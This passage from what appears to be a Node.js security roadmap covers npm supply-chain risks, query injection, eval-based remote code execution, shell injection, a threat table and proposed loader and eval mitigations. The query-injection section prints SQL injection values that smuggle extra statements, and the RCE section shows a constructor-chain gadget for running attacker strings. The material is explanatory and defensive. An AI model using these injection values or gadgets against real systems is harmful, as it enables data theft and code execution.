24 | manages to publish a version with malicious code which is quickly
25 | discovered, it affects projects that deploy during that short "window
26 | of vulnerability." Projects that `npm install` the latest version
27 | straight to production are more likely to fall in that window than
28 | projects that cherrypick versions or that shrinkwrap to make sure that
29 | their development versions match deployed versions.
30 |
31 | [Bower is deprecated][bower-depr] so our discussions focus on
32 | `npmjs.org`, but it's worth noting that Bower has a single point of
33 | failure. Anyone who can create a release branch can commit and
34 | publish a new version.
35 |
36 | [`npm profile`][npm profile] allows requiring
37 | [two factor auth][npm auth-and-writes] for publishing and privilege
38 | changes. If the npm accounts that can publish new versions of a
39 | package only check out code from a GitHub account all of whose
40 | committers use two factors, then there is no single password that can
41 | compromise the system.
42 |
43 | The frequency of malicious code vulnerabilities affecting Node.js is
44 | probably roughly the same as that for other public module repositories.
45 | The npm repo has been a target in the past [1][getcookies-disclosure]
46 | [2][crossenv-typosquat-disclosure].
47 |
48 | The [npm Blog][crossenv-typosquat-disclosure] explains what to do if
49 | you believe you have found malicious code:
50 |
51 | > On August 1, a user notified us via Twitter that a package with a
52 | > name very similar to the popular `cross-env` package was sending
53 | > environment variables from its installation context out to
54 | > npm.hacktask.net. We investigated this report immediately and took
55 | > action to remove the package. Further investigation led us to remove
56 | > about 40 packages in total.
57 | >
58 | > ...
59 | >
60 | > Please do reach out to us immediately if you find malware on the
61 | > registry. The best way to do so is by sending email to
62 | > [security@npmjs.com](mailto:security@npmjs.com). We will act to
63 | > clean up the problem and find related problems if we can.
64 |
65 |
66 | [github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/
67 | [bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/
68 | [dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
69 | [unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html
70 | [npm profile]: https://docs.npmjs.com/cli/profile
71 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
72 | [npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication
73 | [getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies
74 | [crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry
75 |
--------------------------------------------------------------------------------
/chapter-1/threat-QUI.md:
--------------------------------------------------------------------------------
1 | # Query Injection
2 |
3 | [Query injection][] occurs when an attacker causes a query sent to a
4 | database or other backend to have a [structure][spp] that differs from
5 | the one the developer intended.
6 |
7 | ```js
8 | connection.query(
9 | 'SELECT * FROM Table WHERE key="' + value + '"',
10 | callback);
11 | ```
12 |
13 | If an attacker controls `value` and can cause it to contain a double
14 | quote, then they can cause execution of a query with a different structure.
15 | For example, if they can cause
16 |
17 | ```js
18 | value = ' " OR 1 -- two dashes start a line comment';
19 | ```
20 |
21 | then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...`
22 | which returns more rows than intended possibly [leaking](./threat-EXF.md)
23 | data that the requester should not have been able to access, and may
24 | cause other code that loops over the result set to modify rows other than
25 | the ones the system's authors intended.
26 |
27 | Some backends allow statement chaining so compromising a statement
28 | that seems to only read data:
29 |
30 | ```js
31 | value = '"; INSERT INTO Table ... --'
32 | ```
33 |
34 | can violate system integrity by forging records:
35 |
36 | ```js
37 | ' SELECT * FROM Table WHERE key="' + value + '" ' ===
38 | ' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" '
39 | ```
40 |
41 | or deny service via mass deletes.
42 |
43 | Query injection has a [long and storied history][hall-of-shame].
44 |
45 | [Query injection]: http://bobby-tables.com/
46 | [hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
47 | [spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property
48 |
--------------------------------------------------------------------------------
/chapter-1/threat-RCE.md:
--------------------------------------------------------------------------------
1 | # Remote Code Execution
2 |
3 | Remote code execution occurs when the application interprets an
4 | untrustworthy string as code. When `x` is a string, `eval(x)`,
5 | `Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript
6 | engine's parser on `x`. If an attacker controls `x` then they can run
7 | arbitrary code in the context of the CommonJS module or `vm` context
8 | that invoked the parser.
9 |
10 | Sandboxing can help but widely available sandboxes have
11 | [known workarounds][denicola-vm-run] though the [frozen realms][]
12 | proposal aims to change that.
13 |
14 | It is harder to execute remote code in server-side JavaScript.
15 | `this[x][y] = "javascript:console.log(1)"` does not cause code to
16 | execute for nearly as many `x` and `y` as in a browser.
17 |
18 | These operators are probably rarely used *explicitly*, but some
19 | operators that convert strings to code when given a string do
20 | something else when given a `Function` instance. `setTimeout(x, 0)`
21 | is safe when `x` is a function, but on the browser it parses a string
22 | input as code.
23 |
24 | * [Grepping](../appendix/experiments.md#grep-problems) shows the rate
25 | in the top 100 modules and their transitive dependencies by simple
26 | pattern matching after filtering out comments and string content.
27 | This analysis works on most modules, but fails to distinguish
28 | safe uses of `setTimeout` in modules that might run on
29 | the client from unsafe.
30 | * A [type based analysis](../appendix/experiments.md#jsconf) can
31 | distinguish between those two, but the tools we tested don't
32 | deal well with mixed JavaScript and TypeScript inputs.
33 |
34 | Even if we could reliably identify places where strings are
35 | *explicitly* converted to code for the bulk of npm modules,
36 | it is more difficult in JavaScript to statically prove that
37 | code does not *implicitly* invoke a parser than in other
38 | common backend languages.
39 |
40 | ```js
41 | // Let x be any value not in
42 | // (null, undefined, Object.create(null)).
43 | var x = {},
44 | // If the attacker can control three strings
45 | a = 'constructor',
46 | b = 'constructor',
47 | s = 'console.log(s)';
48 | // and trick code into doing two property lookups
49 | // they control, a call with a string they control,
50 | // and one more call with any argument
51 | x[a][b](s)();
52 | // then they can cause any side-effect achievable
53 | // solely via objects reachable from the global scope.
54 | // This includes full access to any exported module APIs,
55 | // all declarations in the current module, and access
56 | // to builtin modules like child_process, fs, and net.
57 | ```
58 |
59 | Filtering out values of `s` that "look like JavaScript" as they reach
60 | server-side code will probably not prevent code execution.
61 | [Yosuke Hasegawa][Yosuke] showed how to reencode arbitrary JavaScript using
62 | only 6 punctuation characters, and that number may
63 | [fall to 5][Masato]. ["Web Application Obfuscation"][obfusc] by
64 | Heiderich et al. catalogues ways to bypass filtering.
65 |
66 | `eval` also allows remote-code execution in Python, PHP, and
67 | Ruby code, but in those languages `eval` operators are harder to
68 | mention implicitly which means uses are easier to check.
69 |
70 | It is possible to dynamically evaluate strings even in statically
71 | compiled languages, for example, [JSR 223][] and
72 | [`javax.compiler`][dynjava] for Java. In statically compiled
73 | languages there is no short implicit path to `eval` and it is not
74 | easier to `eval` an untrusted input than to use an interpreter that is
75 | isolated from the host environment.
76 |
77 | We consider remote code execution in Node.js lower frequency than for
78 | client-side JavaScript without a Content-Security-Policy but higher
79 | than for other backend languages. We consider the severity the same
80 | as for other backend languages. The severity is higher than for
81 | client-side JavaScript because backend code often has access to more
82 | than one user's data and privileged access to other backends.
83 |
84 | [denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0
85 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
86 | [Yosuke]: https://news.ycombinator.com/item?id=4370098
87 | [Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
88 | [obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049
89 | [JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html
90 | [dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html
91 |
--------------------------------------------------------------------------------
/chapter-1/threat-SHP.md:
--------------------------------------------------------------------------------
1 | # Shell Injection during Production
2 |
3 | [Shell injection][] occurs when an attacker-controlled string changes
4 | the structure of a command passed to a shell or causes a child process
5 | to execute an unintended command or with unintended arguments.
6 | Typically, this is because code or a dependency invokes
7 | [child\_process][api/child_process] with an argument partially
8 | composed from untrusted inputs.
9 |
10 | Shell injection may also occur during development and deployment. For
11 | example, [npm][npm hooks] and [Bower][bower hooks]
12 | `{pre-,,post-}install` hooks may be subject to shell injection via
13 | filenames that contain shell meta-characters in malicious transitive
14 | dependencies but we classify this as an [MTP][] vulnerability.
15 |
16 | [MTP]: threat-MTP.md
17 | [npm hooks]: https://docs.npmjs.com/misc/scripts
18 | [bower hooks]: https://bower.io/docs/config/#hooks
19 | [Shell injection]: http://cwe.mitre.org/data/definitions/77.html
20 | [api/child_process]: https://nodejs.org/api/child_process.html
21 |
--------------------------------------------------------------------------------
/chapter-1/threats.md:
--------------------------------------------------------------------------------
1 | # Threat environment
2 |
3 | The threat environment for Node.js is similar to that for other runtimes that
4 | are primarily used for microservices and web frontends, but there are some
5 | Node.js specific concerns.
6 |
7 | We define both kinds of threats in this section. A reader familiar with
8 | web-application security can skip all but this page and the discussion
9 | of [*unintended require*][UIR] without missing much, but may find it
10 | helpful to refer back to the table below when reading later chapters.
11 |
12 | ## Server vs Client-side JavaScript
13 |
14 | Before we discuss the threat environment, it's worth noting that the threat
15 | environment for server-side JavaScript is quite different from that for
16 | client-side JavaScript. For example,
17 |
18 | * Client-side JavaScript runs in the context of the
19 | [same-origin policy][] possibly with a
20 | [Content-Security-Policy][CSP] which governs which code can load.
21 | Server-side JavaScript **code loading** is typically only
22 | constrained by the files on the server, and the values that can
23 | reach `require(...)`, `eval(...)` and similar operators.
24 | * Client-side JavaScript typically only has access to data that the
25 | human using the browser should have access to. On the server,
26 | applications are responsible for **data [compartmentalization][]**,
27 | and server-side JavaScript often has privileged access to storage
28 | systems and other backends.
29 | * **File-system access** by the client typically either requires human
30 | interaction
31 | (`<input type=file>`, `Content-disposition:attachment`), or can only access
32 | a directory dedicated to third-party content (browser cache, local storage)
33 | and which is not usually on a list like `$PATH`.
34 | On the server, the Node runtime process's privileges determine
35 | [file-system access][nodejs/fs].
36 | * Client-side JavaScript has no concept of a **shell** that converts
37 | strings into commands that run outside the JavaScript engine.
38 | Server-side JavaScript can spawn
39 | [child processes][nodejs/child_process] that operate on data
40 | received over the network, and on data that is accessible to the
41 | Node runtime process.
42 | * **Network messages** sent by server-side JavaScript originate inside
43 | the server's LAN, but those sent by client-side JavaScript typically do not.
44 | * **Shared memory concurrency** in client-side JavaScript happens via
45 | well-understood APIs like `SharedArrayBuffer`. Experimental modules
46 | ([code][threads-a-gogo]) and a [workers proposal][]
47 | allow server-side JavaScript to fork threads; it is
48 | unclear how widespread these are in production or how
49 | [susceptible][thread corner cases] these are to memory corruption
50 | or exploitable race conditions.
51 | * Client-side, the browser halts all scripts in a document when a
52 | single event loop cycle **runs too long**.
53 | Node.js has few ways to manage runaway computations on the server.
54 |
55 | The threat environment for server-side JavaScript is much closer to
56 | that for any other server-side framework than to that for JavaScript in the
57 | browser.
58 |
59 | ## Classes of Threats {#threat_table}
60 |
61 | The table below lists broad classes of vulnerabilities, and for each,
62 | a short identifier by which we refer to the class later in this
63 | document. This list is not meant to be comprehensive, but we expect
64 | that a thorough security assessment would touch on most of these and
65 | would have low confidence in an assessment that skips many.
66 |
67 | The frequency and severity of vulnerabilities are guesstimates since
68 | we have little hard data on the frequency of these in Node.js
69 | applications, so have extrapolated from similar systems. For example,
70 | see discussion about frequency in [buffer overflow][BOF].
71 |
72 | For each, relevant mitigation strategies appear in the mitigations
73 | column, and link to the discussion.
74 |
75 | | Shorthand | Description | Frequency | Severity | Mitigations |
76 | | --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- |
77 | | [0DY][] | Zero-day. Attackers exploit a vulnerability before a fix is available. | Low-Med | Med-High | [cdeps][m-cd] [fail][m-fa] |
78 | | [BOF][] | Buffer overflow. | Low | High | [ovrsi][m-os] |
79 | | [CRY][] | Misuse of crypto leads to poor access-control decisions or data leaks. | Medium | Medium | [ovrsi][m-os] |
80 | | [DEX][] | Poor developer experience slows or prevents release of features. | ? | ? | [dynam][m-dy] [ovrsi][m-os] |
81 | | [DOS][] | Denial of service | Medium | Low-Med | TBD |
82 | | [EXF][] | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended. | Med-High | Low-Med | [ovrsi][m-os] |
83 | | [LQC][] | Using low quality dependencies leads to exploit | Medium | Low-Med | [kdeps][m-kd] [ovrsi][m-os] |
84 | | [MTP][] | Theft of commit rights or MITM causes `npm install` to fetch malicious code. | Low | Med-High | [kdeps][m-kd] [cdeps][m-cd] |
85 | | [QUI][] | Query injection on a production machine. | Medium | Med-High | [ovrsi][m-os] [qlang][m-ql] |
86 | | [RCE][] | Remote code execution, e.g. via `eval` | Med-High | High | [dynam][m-dy] [ovrsi][m-os] |
87 | | [SHP][] | Shell injection on a production machine. | Low | High | [ovrsi][m-os] [cproc][m-cp] |
88 | | [UIR][] | `require(untrustworthyInput)` loads code not intended for production. | Low | Low-High | [dynam][m-dy] |
89 |
90 |
91 | ## Meltdown and Spectre
92 |
93 | As of this writing, the security community is trying to digest
94 | the implications of *Meltdown* and *Spectre*. The
95 | [Node.js blog][Meltdown Spectre Impact] addresses them from a
96 | Node.js perspective, so we do not comment in depth.
97 |
98 | It is worth noting though that those vulnerabilities lead to
99 | breaches of *confidentiality*. While confidentiality violations
100 | are serious, the suggestions that follow use design principles
101 | that prevent a violation of confidentiality from causing a
102 | violation of *integrity*. Specifically:
103 |
104 | * Knowing a whitelist of production source hashes does not
105 | allow an attacker to cause a non-production source to load.
106 | * Our runtime `eval` mitigation relies on JavaScript reference
107 | equality, not knowledge of a secret.
108 |
109 |
110 | [same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
111 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
112 | [compartmentalization]: https://cwe.mitre.org/data/definitions/653.html
113 | [nodejs/fs]: https://nodejs.org/api/fs.html
114 | [nodejs/child_process]: https://nodejs.org/api/child_process.html
115 | [threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387
116 | [workers proposal]: https://github.com/nodejs/worker/issues/2
117 | [thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967
118 | [Query Injection]: https://cwe.mitre.org/data/definitions/89.html
119 | [0DY]: threat-0DY.md
120 | [BOF]: threat-BOF.md
121 | [CRY]: threat-CRY.md
122 | [DEX]: threat-DEX.md
123 | [DOS]: threat-DOS.md
124 | [EXF]: threat-EXF.md
125 | [LQC]: threat-LQC.md
126 | [MTP]: threat-MTP.md
127 | [QUI]: threat-QUI.md
128 | [RCE]: threat-RCE.md
129 | [SHP]: threat-SHP.md
130 | [UIR]: threat-UIR.md
131 | [m-dy]: ../chapter-2/dynamism.md
132 | [m-kd]: ../chapter-3/knowing_dependencies.md
133 | [m-cd]: ../chapter-4/close_dependencies.md
134 | [m-os]: ../chapter-5/oversight.md
135 | [m-fa]: ../chapter-6/failing.md
136 | [m-cp]: ../chapter-7/child-processes.md
137 | [m-ql]: ../chapter-7/query-langs.md
138 | [Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/
139 |
--------------------------------------------------------------------------------
/chapter-2/bounded-eval.md:
--------------------------------------------------------------------------------
1 | # Dynamically bounding `eval`
2 |
3 | If we could provide an API that was available statically, but not dynamically
4 | we could double-check uses of `eval` operators.
5 |
6 | ```js
7 | // API for allowing some eval
8 | var prettyPlease = require('prettyPlease');
9 | // Carefully reviewed JavaScript generating code
10 | var codeGenerator = require('codeGenerator');
11 |
12 | let compile;
13 |
14 | prettyPlease.mayI(
15 | module,
16 | (evalPermission) => {
17 | compile = function (source) {
18 | const js = codeGenerator.generateCode(source);
19 | return prettyPlease.letMeEval(
20 | evalPermission,
21 | js,
22 | () => ((0, eval)(js)));
23 | };
24 | });
25 |
26 | exports.compile = compile;
27 | ```
28 |
29 | The `prettyPlease` module cannot be pure JavaScript since only the
30 | C++ linker can take advantage of *CodeGeneration* callbacks
31 | ([code][CodeGeneration callbacks]) the way CSP does
32 | ([code][CSP callback]) on the client, but the definition would be
33 | roughly:
34 |
35 | ```js
36 | // prettyPlease module
37 | (() => {
38 | const _PERMISSIVE_MODE = 0; // Default
39 | const _STRICT_MODE = 1;
40 | const _REPORT_ONLY_MODE = 2;
41 |
42 | const _MODE = /* From command line arguments */;
43 | const _WHITELIST = new Set(/* From command line arguments */);
44 |
45 | const _VALID_PERMISSIONS = new WeakSet();
46 | const _EVALABLE_SOURCES = new Map();
47 |
48 | if (_MODE !== _PERMISSIVE_MODE) {
49 | // Pseudocode: the code-generation callback installed when the
50 | // JavaScript engine is initialized.
51 | function codeGenerationCheckCallback(context, source) {
52 | // source must be a v8::Local or ChakraCore equivalent
53 | // so no risk of polymorphing
54 | if (_EVALABLE_SOURCES.has(source)) {
55 | return true;
56 | }
57 | console.warn(...);
58 | return _MODE == _REPORT_ONLY_MODE;
59 | }
60 | }
61 |
62 | // requestor -- the `module` value in the scope of the code requesting
63 | // permissions.
64 | // callback -- called with the generated permission whether granted or
65 | // not. This puts the permission in a parameter name making it
66 | // much less likely that an attacker who controls a key to obj[key]
67 | // can steal it.
68 | module.mayI = function (requestor, callback) {
69 | const id = String(requestor.id);
70 | const filename = String(requestor.filename);
71 | const permission = Object.create(null); // Token used for identity
72 | // TODO: Needs privileged access to real module cache so a module
73 | // can't masquerade as another by mutating the module cache.
74 | if (_MODE !== _PERMISSIVE_MODE
75 | && requestor === require.cache[filename]
76 | && _WHITELIST.has(id)) {
77 | _VALID_PERMISSIONS.add(permission);
78 | // Typical usage is to request permission once during module load.
79 | // Removing from whitelist prevents later bogus requests after
80 | // the module is exposed to untrusted inputs.
81 | _WHITELIST.delete(id);
82 | }
83 | return callback(permission);
84 | };
85 |
86 | // permission -- a value received via mayI
87 | // sourceToEval -- code to eval. The code generation callback will
88 | // expect this exact string as its source.
89 | // codeThatEvals -- a callback that will be called in a scope that
90 | // allows eval of sourceToEval.
91 | module.letMeEval = function (permission, sourceToEval, codeThatEvals) {
92 | sourceToEval = String(sourceToEval);
93 | if (_MODE === _PERMISSIVE_MODE) {
94 | return codeThatEvals();
95 | }
96 |
97 | if (!_VALID_PERMISSIONS.has(permission)) {
98 | console.warn(...);
99 | if (_MODE !== _REPORT_ONLY_MODE) {
100 | return codeThatEvals();
101 | }
102 | }
103 |
104 | const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0;
105 | _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1);
106 | try {
107 | return codeThatEvals();
108 | } finally {
109 | if (countBefore) {
110 | _EVALABLE_SOURCES.set(sourceToEval, countBefore);
111 | } else {
112 | _EVALABLE_SOURCES.delete(sourceToEval);
113 | }
114 | }
115 | };
116 | })();
117 | ```
118 |
119 | and the `eval` operators would check that their argument is in the global
120 | set.
121 |
122 | Implicit access to `eval` is possible because reflective operators can
123 | reach `eval`. As long as we can prevent reflective access to
124 | `evalPermission` we can constrain what can be `eval`ed. If
125 | `evalPermission` is a function parameter, then only `arguments`
126 | aliases it, so functions that do not mention the special name
127 | `arguments` may safely receive one. Most functions do not mention
128 | `arguments`. Before whitelisting a module, a reviewer would be wise
129 | to check for any use of `arguments`, and for any escape of permissions
130 | or `module`.
131 |
132 | `evalPermission` is an opaque token — only its reference identity
133 | is significant, so we can check membership in a `WeakSet` without
134 | risk of forgery.
135 |
136 | This requires API changes to existing modules that dynamically use
137 | `eval`, but the changes should be additive and straightforward.
138 |
139 | It also allows project teams and security specialists to decide on
140 | a case-by-case basis, which modules really need dynamic `eval`.
141 |
142 | As with synthetic modules, frozen realms may provide a way to further
143 | restrict what dynamically loaded code can do. If you're trying to
144 | decide whether to trust a module that dynamically loads code, you have
145 | more ways to justifiably conclude that it's safe if the module loads
146 | into a sandbox restricted to a limited frozen API.
147 |
148 | [CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626
149 | [CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352
150 |
--------------------------------------------------------------------------------
/chapter-2/bundling.md:
--------------------------------------------------------------------------------
1 | # Dynamic Bundling
2 |
3 | Consider a simple Node application:
4 |
5 | ```js
6 | // index.js
7 | // Example that uses various require(...) use cases.
8 |
9 | let staticLoad = require('./lib/static');
10 | function dynamicLoad(f, x) {
11 | return f('./lib/' + x);
12 | }
13 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
14 | exports.lazyLoad = () => require('./lib/lazy');
15 |
16 | // Fallback to alternatives
17 | require(['./lib/opt1', './lib/opt2'].find(
18 | (name) => {
19 | try {
20 | require.resolve(name);
21 | return true;
22 | } catch (_) {
23 | return false;
24 | }
25 | }));
26 | ```
27 |
28 | with some unit tests:
29 |
30 | ```js
31 | // test/test.js
32 |
33 | var expect = require("chai").expect;
34 | var app = require("../index");
35 |
36 | describe("My TestSuite", () => {
37 | describe("A test", () => {
38 | it("A unittest", () => {
39 | // Exercise the API
40 | app.lazyLoad();
41 | });
42 | });
43 | });
44 | ```
45 |
46 | We hack `updateChildren`, which gets called by `Module._load` for new
47 | modules and when a module requires a cached module, to dump information
48 | about loads:
49 |
50 | ```diff
51 | diff --git a/lib/module.js b/lib/module.js
52 | index cc8d5097bb..945ab8a4a8 100644
53 | --- a/lib/module.js
54 | +++ b/lib/module.js
55 | @@ -59,8 +59,18 @@ stat.cache = null;
56 |
57 | function updateChildren(parent, child, scan) {
58 | var children = parent && parent.children;
59 | - if (children && !(scan && children.includes(child)))
60 | + if (children && !(scan && children.includes(child))) {
61 | + if (parent.filename && child.id) {
62 | + // HACK: rather than require('fs') to write a file out, we
63 | + // log to the console.
64 | + // We assume the prefix will be removed and the result wrapped in
65 | + // a DOT digraph.
66 | + console.log(
67 | + 'REQUIRE_LOG_DOT: ' + JSON.stringify(parent.filename)
68 | + + ' -> ' + JSON.stringify(child.id) + ';');
69 | + }
70 | children.push(child);
71 | + }
72 | }
73 | ```
74 |
75 | Running the tests and extracting the graph ([code][extract-script])
76 | gives us a rather [hairy dependency graph](example/graphs/full.svg):
77 |
78 |
79 |
80 | We add an edge from `"./package.json"` to the module's main file.
81 | Then we filter edges ([code][graph-filter]) to include only those
82 | reachable from `"./package.json"`. This lets us distinguish files
83 | loaded by the test runner and tests from those loaded after control
84 | has entered an API in a production file.
85 |
86 | The resulting graph is much simpler:
87 |
88 | ![Filtered dependency graph](example/graphs/filtered.svg)
89 |
90 | Note that the production file list includes dynamically and lazily
91 | loaded files. It does include `./lib/opt2.js` but not `./lib/opt1.js`.
92 | The latter file does not exist, so the loop which picks the first
93 | available alternative tries and finds the former.
94 |
95 | Our production source list should include all the files we need
96 | in production if
97 |
98 | * The unit tests `require` the main file
99 | * The unit tests have enough coverage to load all modules required
100 | in production via APIs defined in the main file or in APIs
101 | transitively loaded from there.
102 |
103 | It is definitely possible to miss some files. If the unit test did
104 | not call `app.lazyLoad` then there would be no edge to
105 | `./lib/lazy.js`. To address this, developers can
106 |
107 | * Expand test coverage to exercise code paths that load the
108 | missing source files.
109 | * Or add an explicit whitelist like
110 | ```js
111 | // production-source-whitelist.js
112 | require('./index.js');
113 | require('./lib/lazy.js');
114 | ```
115 | and explicitly pass this as the main file to the filter
116 | instead of defaulting to the one specified in `package.json`.
117 |
118 | Dynamic analysis is not perfect, but a missing source file is
119 | readily apparent, so this replaces
120 |
121 | * hard-to-detect bugs with potentially severe security consequences,
122 |
123 | with
124 |
125 | * easy-to-detect bugs with negligible security consequences.
126 |
127 | [extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh
128 | [graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73
129 |
--------------------------------------------------------------------------------
/chapter-2/dynamism.md:
--------------------------------------------------------------------------------
1 | # Dynamism when you need it
2 |
3 | ## Background
4 |
5 | Node.js code is composed of CommonJS modules that are linked together
6 | by the builtin `require` function, or [`import`][import-js] statements
7 | (used by [TypeScript][import-ts]) that typically transpile to
8 | `require` (modulo [experimental features][esm]).
9 |
10 | `require` itself calls `Module._load` ([code][Module._load]) to
11 | resolve and load code. ["The Node.js Way"][FKS] explains this flow
12 | well.
13 |
14 | Unlike `import`, `require` is dynamic: a runtime value can specify the
15 | name of a module to load. (The EcmaScript committee is considering a
16 | [dynamic `import` operator][import-op-strawman], but we have
17 | not included that in this analysis.)
18 |
19 |
20 | This dynamism is powerful and flexible and enables varied use cases
21 | like the following:
22 |
23 | * Lazy loading. Waiting to load a dependency until it is definitely needed.
24 | ```js
25 | const infrequentlyUsedAPI = (function () {
26 | const dependency = require('dependency');
27 | return function infrequentlyUsedAPI() {
28 | // Use dependency
29 | };
30 | }());
31 | ```
32 | * Loading plugins based on a configuration object.
33 | ```js
34 | function Service(config) {
35 | (config.plugins || []).forEach(
36 | (pluginName) => {
37 | require(pluginName).initPlugin(this);
38 | });
39 | }
40 | ```
41 | * Falling back to an alternate service provider if the first choice
42 | isn't available:
43 | ```js
44 | const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget'];
45 | const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find(
46 | (name) => {
47 | try {
48 | require.resolve(name);
49 | return true;
50 | } catch (_) {
51 | return false;
52 | }
53 | });
54 | const serviceProvider = require(serviceProviderName);
55 | ```
56 | * Taking advantage of an optional dependency when it is available.
57 | ```js
58 | let optionalDependency = null;
59 | try {
60 | optionalDependency = require('optionalDependency');
61 | } catch (_) {
62 | // Oh well.
63 | }
64 | ```
65 | * Loading a handler for a runtime value based on a naming convention.
66 | ```js
67 | function handle(request) {
68 | const handlerName = request.type + '-handler'; // Documented convention
69 | let handler;
70 | try {
71 | handler = require(handlerName);
72 | } catch (e) {
73 | throw new Error(
74 | 'Expected handler ' + handlerName
75 | + ' for requests with type ' + request.type);
76 | }
77 | return handler.handle(request);
78 | }
79 | ```
80 | * Introspecting over module metadata.
81 | ```js
82 | const version = require('./package.json').version;
83 | ```
84 |
85 | During rapid development, [file-system monitors][nodemon] can restart
86 | a node project when source files change, and the application stitches
87 | itself together without the complex compiler and build system
88 | integration that statically compiled languages use to do incremental
89 | recompilation.
90 |
91 |
92 | ## Problem
93 |
94 | Threats: [DEX][] [RCE][] [UIR][]
95 |
96 | The `node_modules` directory does not keep production code separate
97 | from test code. If test code can be `require`d in production, then
98 | an attacker may find it far easier to execute a wide variety of other
99 | attacks. See [UIR][] for more details on this.
100 |
101 | Node applications rely on dynamic uses of `require` and changes that
102 | break any of these use cases would require coordinating large scale
103 | changes to existing code, tools, and development practices threatening
104 | [developer experience][DEX].
105 |
106 | Requiring developers to pick and choose which source files are
107 | production and which are test would either:
108 |
109 | * Require them to scrutinize source files not only for their project
110 | but also for deep dependencies with which they are unfamiliar
111 | leading to poor developer experience.
112 | * Lead them to whitelist files without scrutiny, leading back to the original security problem.
113 | * Lead them to not use available modules to solve problems and instead
114 | roll their own leading to poor developer experience, and possibly
115 | [LQC][] problems.
116 |
117 | We need to ensure that only source code written with production
118 | constraints in mind loads in production without increasing the burden
119 | on developers.
120 |
121 | When the behavior of code in production is markedly different from that
122 | on a developer's workstation, developers lose confidence that they
123 | can avoid bugs in production by testing locally which may lead
124 | to poor developer experience and lower quality code.
125 |
126 |
127 | ## Success Criteria
128 |
129 | We would have prevented abuse of `require` if:
130 |
131 | * Untrusted inputs could not cause `require` to load a
132 | non-production source file,
133 | * and/or no non-production source files are reachable by
134 | `require`,
135 | * and/or loading a non-production source file has no adverse effect.
136 |
137 | We would have successfully prevented abuse of `eval`, `new Function`
138 | and related operators if:
139 |
140 | * Untrusted inputs cannot reach an `eval` operator,
141 | * and/or untrusted inputs that reach them cause no adverse effects,
142 | * and/or security specialists could whitelist uses of `eval` operators
143 | that are necessary for the functioning of the larger
144 | system and compatible with the system's security goals.
145 |
146 | In both cases, converting dynamic operators to static before untrusted
147 | inputs reach the system reduces the attack surface. Requiring
148 | large-scale changes to existing npm modules or requiring large-scale
149 | rewrites of code that uses them compromises [DEX][].
150 |
151 |
152 | ## Current practices
153 |
154 | Some development teams use [webpack][] or similar tools to statically
155 | bundle server-side modules, and provide flexible transpilation
156 | pipelines. That's a great way to do things, but solving security
157 | problems only for teams with development practices mature enough to
158 | deploy via webpack risks preaching to the choir.
159 |
160 | Webpack, in its minimal configuration, does not attempt to skip
161 | test files ([code][webpack-experiment]).
162 | Teams with an experienced webpack user can use it to great effect, but
163 | it is not an out-of-the-box solution.
164 |
165 | Webpacking does not prevent calls to `require(...)` with unintended
166 | arguments, but greatly reduces the chance that they will load
167 | non-production code. As long as the server process cannot read
168 | JS files other than those in the bundle, then a webpacked server
169 | is safe from [UIR][]. This may not be the case if the production
170 | machine has npm modules globally installed, and the server process
171 | is not running in a [chroot jail][].
172 |
173 |
174 | ## A Possible Solution
175 |
176 | We present one possible solution to demonstrate that tackling this
177 | problem is feasible.
178 |
179 | If we can compute the entire set of `require`-able sources when
180 | dealing only with inputs from trusted sources, then we can
181 | ensure that the node runtime only loads those sources even when
182 | exposed to untrusted inputs.
183 |
184 | We propose these changes:
185 |
186 | * A two phase approach to prevent abuse of `require`.
187 | 1. Tweaks to the node module loader that make it easy to
188 | [dynamically bundle](bundling.md) a release candidate.
189 | 2. Tweaks to the node module loader in production to restrict
190 | code loads based on [source content hashes](source-contents.md)
191 | from the bundling phase.
